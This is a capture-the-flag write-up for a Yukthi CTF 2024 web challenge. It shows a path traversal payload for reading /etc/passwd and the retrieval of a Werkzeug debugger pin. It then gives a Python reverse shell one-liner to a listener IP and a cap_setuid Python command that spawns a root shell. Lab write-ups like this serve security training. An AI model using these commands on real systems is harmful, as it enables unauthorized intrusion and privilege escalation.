Introduction
Operation Warehouse is a web-based challenge in the Yukthi CTF 2024 prelims, featuring a multi-layered cyber puzzle set within a simulated underground network. Participants are plunged into a scenario where exploiting a Flask debug console vulnerability and a path traversal bug is just the beginning. Successful exploitation leads to acquiring the Werkzeug debugger pin, enabling a reverse shell through the Python console for initial machine access. The journey deepens on a second machine, where Python's setcap capabilities become the key to unlocking root access, challenging competitors to leverage their skills in real-world attack simulations effectively
Skills Learned
- Reconnaissance and exploitation strategies
- Privilege escalation and system security bypass
- Network Reconnaissance & web pentestesting
Enumeration
1. Initial Reconnaissance
Conduct a port scan using nmap
to identify active ports. The scan reveals that port 7777 is open, suggesting a web service might be running on that port.
nmap -p- ipaddress
This scan shows that port 7777 is actively accepting connections, which is typically indicative of a web service.
2. Exploring Port 7777
Port forwarding to port 7777 revealed a website running on the server.
Analyzing the webpage's source code led to the discovery of an interesting endpoint: `readfile?file=about.html`. Altering this endpoint to `readfile?file=....//...//` exposed a Flask error message, confirming the server's framework.
OR
To confirm that Flask is running on the server, you can use Wappalyzer, a tool that detects technologies used on websites. This tool is helpful in quickly identifying backend technologies without needing to delve into source code errors or specific endpoints.
Further attempts to access the `/console` endpoint succeeded, displaying the debug console pin on the production server.
The specific endpoints and debug features are exposed because the application is configured with DEBUG=True in its production settings. This configuration is generally used for development purposes to provide detailed error messages and access to interactive debug consoles, which should be disabled in a live production environment to prevent security vulnerabilities
3. Exploiting Path Traversal
The `readfile` endpoint, which served files directly, was scrutinized next. The URL `http://127.0.0.1:7777/readfile?file=app.py ` indicated susceptibility to a path traversal attack. The application's handling of path traversal was peculiar, as "../" sequences were replaced with an empty string initially, and subsequent "../" were converted to a dot.
Using this knowledge, the following URL was crafted to exploit the vulnerability and attempt to read system files like `/etc/passwd`:
http://127.0.0.1:7777/readfile?file=....//...//...//...//...//...//...//...//etc/passwd
To effectively exploit the Flask debugger's vulnerabilities, specific detailed information about the application environment is needed. Here’s a breakdown of the data required and how to use it to retrieve the console pin using a script designed for bypassing the Werkzeug debug console.
** Required Data for Console Pin Exploitation
To exploit the console pin, you need specific details about the Flask application environment, which are crucial for the script to generate the correct console pin. The necessary details include:
- Username: The username under which the Flask application is running.
- Modname: The name of the main module of the Flask application.
- Machine ID: A unique identifier for the host machine which can sometimes be extracted from files like `/etc/machine-id`.
- MAC Address: The MAC address of the network interface, often obtainable via system files or network configuration commands.
These details can typically be found by examining files within the application environment or by exploiting other vulnerabilities such as the path traversal flaw discovered.
For additional information and the script, check out the GitHub repository
https://github.com/wdahlenburg/werkzeug-debug-console-bypass
Using this script correctly with the appropriate data will allow you to bypass the Werkzeug debug console's security and gain access, which can be crucial in a penetration testing scenario or a CTF challenge.
OR
4. Obtaining Console Pin using automation script
The path traversal vulnerability was further exploited to obtain the console pin. A script was used to automate fetching the necessary data such as Flask app module names and machine identifiers:
https://git.selfmade.ninja/Jawahar.s/werkpin/-/blob/master/werkpindebug.py
This script, when executed, provides the debug console pin
5. Exploiting the Debug Console
With the debug pin in hand, a reverse shell was targeted next. A listener was set up using `nc`:
nc -lnvp 9001
Executing the following Python script then allowed a reverse shell connection to be established:
import os;os.popen("""python3 -c 'import socket,subprocess,os,tty,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("172.30.0.73",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'""")
The reverse shell provided direct command line access to the server.
6. Victory
Using the obtained shell access, navigation to `/home/jamie` was accomplished to retrieve the first flag.
Second Challenge: Escalating Privileges
1. Identifying Python Capability
To escalate privileges, first, identify if any system binaries have special capabilities that can be exploited. This can be done using the `getcap` command, which lists all capabilities granted to executables.
-
Command:
getcap -r / 2> /dev/null
This command recursively searches the root directory for all files with any set capabilities, redirecting errors to null to clean up the output.
-
Finding: The command reveals that Python 3.8 has been granted special capabilities, making it a potential vector for privilege escalation.
2. Escalating Privileges Using Python
With Python 3.8 identified as having special capabilities, it can be used to execute commands as the root user. This is particularly useful if Python has the `cap_setuid` capability which allows changing the UID (User ID) of the process.
- Exploitation Command:
python3.8 -c 'import os; os.setuid(0); os.system("/bin/sh")'
This command uses Python to change the current process's user ID to root (UID 0) and then spawns a shell with root privileges.
- Execution:
Run the above command in the terminal where Python's capabilities allow setting UID. If successful, this command grants a root shell, bypassing normal security restrictions.
3. Victory: Retrieving the Flag
Once root access is obtained, navigate to the root directory to search for sensitive files or the CTF challenge flag.
- Retrieve the Flag:
cd /root && cat secretfile
This final step involves navigating to the root user's home directory and reading the contents of
secretfile
, where the flag for the second challenge is stored.